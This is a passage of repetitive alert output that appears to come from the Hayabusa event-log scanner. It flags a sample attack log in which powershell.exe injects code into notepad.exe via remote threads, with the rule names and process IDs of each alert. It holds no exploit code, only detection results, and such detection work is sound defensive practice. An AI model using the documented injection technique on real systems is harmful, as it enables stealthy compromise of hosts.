Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.817 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.833 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.848 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.864 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.880 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.895 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.926 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.942 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.973 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.989 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.005 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.020 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.036 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.051 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.083 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.098 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.114 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.130 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.145 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.161 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.192 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.208 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 2019-05-19 02:16:17.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 